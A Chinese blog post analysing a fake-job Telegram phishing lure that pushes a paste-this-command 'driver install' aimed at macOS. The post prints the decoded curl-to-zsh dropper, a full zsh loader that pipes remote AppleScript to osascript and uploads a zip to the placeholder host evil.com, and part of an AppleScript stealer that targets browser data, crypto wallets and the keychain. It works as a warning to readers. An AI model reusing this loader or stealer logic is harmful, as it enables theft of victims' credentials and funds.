见识 Tg 钓鱼

文中代码均已消毒处理

最近在看新的工作机会，遇到一个让加 tg 的，本来觉着没啥，也就在 tg 上沟通

越聊越觉得对面的文字不像是人打出来的，遣词造句的风格，难以言说

终于发来了面试链接，一点开就是个弹窗，要复制命令装驱动，一眼钓鱼

还是按耐不住好奇心，复制来看看，最基础的 echo | base64 -d | zsh

于是解码看看是啥

echo ‘The sound carder drver certificate is currently beinginstalledand updated. Please wait…’ & curl xxx.evil/xxx | zsh

好嘛，又下载了一个脚本，接着扒

又是个 base64 之后的压缩包解压再 eval 的脚本，继续解压看看

 1#!/bin/zsh
 2daemon_function() {
 3    exec </dev/null
 4    exec >/dev/null
 5    exec 2>/dev/null
 6    local domain="evil.com"
 7    local token="xxxx"
 8    local api_key="xx"
 9    local file="/tmp/osalogging.zip"
10    if [ $# -gt 0 ]; then
11        curl -k -s --max-time 30 \
12            -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
13            -H "api-key: $api_key" \
14            "http://$domain/dynamic?txd=$token&pwd=$1" | osascript
15    else
16        curl -k -s --max-time 30 \
17            -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
18            -H "api-key: $api_key" \
19            "http://$domain/dynamic?txd=$token" | osascript
20    fi
21    if [ $? -ne 0 ]; then
22        exit 1
23    fi
24    if [[ ! -f "$file" || ! -s "$file" ]]; then
25        return 1
26    fi
27    local CHUNK_SIZE=$((10 * 1024 * 1024))
28    local MAX_RETRIES=8
29    local upload_id=$(date +%s)-$(openssl rand -hex 8 2>/dev/null || echo $RANDOM$RANDOM)
30    local total_size
31    total_size=$(stat -f %z "$file" 2>/dev/null || stat -c %s "$file")
32    if [[ -z "$total_size" || "$total_size" -eq 0 ]]; then
33        return 1
34    fi
35    local total_chunks=$(( (total_size + CHUNK_SIZE - 1) / CHUNK_SIZE ))
36    local i=0
37    while (( i < total_chunks )); do
38        local offset=$((i * CHUNK_SIZE))
39        local chunk_size=$CHUNK_SIZE
40        (( offset + chunk_size > total_size )) && chunk_size=$((total_size - offset))
41        local success=0
42        local attempt=1
43        while (( attempt <= MAX_RETRIES && success == 0 )); do
44            http_code=$(dd if="$file" bs=1 skip=$offset count=$chunk_size 2>/dev/null | \
45                curl -k -s -X PUT \
46                --data-binary @- \
47                -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
48                -H "api-key: $api_key" \
49                --max-time 180 \
50                -o /dev/null \
51                -w "%{http_code}" \
52                "http://$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks" 2>/dev/null)
53            curl_status=$?
54            if [[ $curl_status -eq 0 && $http_code -ge 200 && $http_code -lt 300 ]]; then
55                success=1
56            else
57                ((attempt++))
58                sleep $((3 + attempt * 2))
59            fi
60        done
61        if (( success == 0 )); then
62            return 1
63        fi
64        ((i++))
65    done
66    rm -f "$file"
67    return 0
68}
69if daemon_function "$@" & then
70    exit 0
71else
72    exit 1
73fi

终于是个有点事做的脚本了，做的事情也很简单，下载恶意脚本交给 osascript 执行，再上传本地的 /tmp/osalogging.zip 包

可能因为我访问链接是 macOS 系统，所以给出的是 osascript 脚本

这下下载到的就事真正做坏事的脚本了，只贴出无害部分

set chromiumMap to {}
set chromiumMap to chromiumMap & {{"Yandex", library & "Yandex/YandexBrowser/"}}
set chromiumMap to chromiumMap & {{"Chrome", library & "Google/Chrome/"}}
set chromiumMap to chromiumMap & {{"Brave", library & "BraveSoftware/Brave-Browser/"}}
set chromiumMap to chromiumMap & {{"Edge", library & "Microsoft Edge/"}}
set chromiumMap to chromiumMap & {{"Vivaldi", library & "Vivaldi/"}}
set chromiumMap to chromiumMap & {{"Opera", library & "com.operasoftware.Opera/"}}
set chromiumMap to chromiumMap & {{"OperaGX", library & "com.operasoftware.OperaGX/"}}
set chromiumMap to chromiumMap & {{"Chrome Beta", library & "Google/Chrome Beta/"}}
set chromiumMap to chromiumMap & {{"Chrome Canary", library & "Google/Chrome Canary"}}
set chromiumMap to chromiumMap & {{"Chromium", library & "Chromium/"}}
set chromiumMap to chromiumMap & {{"Chrome Dev", library & "Google/Chrome Dev/"}}
set chromiumMap to chromiumMap & {{"Arc", library & "Arc/User Data"}}
set chromiumMap to chromiumMap & {{"Coccoc", library & "CocCoc/Browser/"}}

set geckoMap to {}
set geckoMap to geckoMap & {{"Firefox", library & "Firefox/Profiles/"}}
set geckoMap to geckoMap & {{"Zen", library & "zen/Profiles/"}}
set geckoMap to geckoMap & {{"LibreWolf", library & "LibreWolf/Profiles/"}}
set geckoMap to geckoMap & {{"Waterfox", library & "Waterfox/Profiles/"}}

set walletMap to {}
set walletMap to walletMap & {{"Wallets/Desktop/Exodus", library & "Exodus/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Electrum", profile & "/.electrum/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Atomic", library & "Atomic Wallet/Local Storage/leveldb/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Guarda", library & "Guarda/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Coinomi", library & "Coinomi/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Sparrow", profile & "/.sparrow/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Wasabi", profile & "/.walletwasabi/client/Wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Bitcoin_Core", library & "Bitcoin/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Armory", library & "Armory/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Electron_Cash", profile & "/.electron-cash/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Monero", profile & "/.bitmonero/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Litecoin_Core", library & "Litecoin/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Dash_Core", library & "DashCore/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Dogecoin_Core", library & "Dogecoin/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Electrum_LTC", profile & "/.electrum-ltc/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/BlueWallet", library & "BlueWallet/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Zengo", library & "Zengo/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Trust", library & "Trust Wallet/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Ledger Live", library & "Ledger Live/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Ledger Wallet", library & "Ledger Wallet/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Trezor Suite", library & "@trezor"}}


Chromium(writemind, chromiumMap)
ChromiumWallets(writemind, chromiumMap)
Gecko(writemind, geckoMap)
DesktopWallets(writemind, walletMap)
Telegram(writemind, library)
Keychains(writemind)
CloudKeys(writemind & "Profile/")
Processes(writemind)

Filegrabber(writemind)

try
        do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/osalogging.zip"
end try
try
        do shell script "rm -rf /tmp/sync*"
end try

坏得很呀，各大浏览器，各个钱包的数据，全部打包到 /tmp/osalogging.zip

配合刚才那个脚本，所有数据打包上传一条龙，不小心执行了网页上复制的命令可就得遭老罪了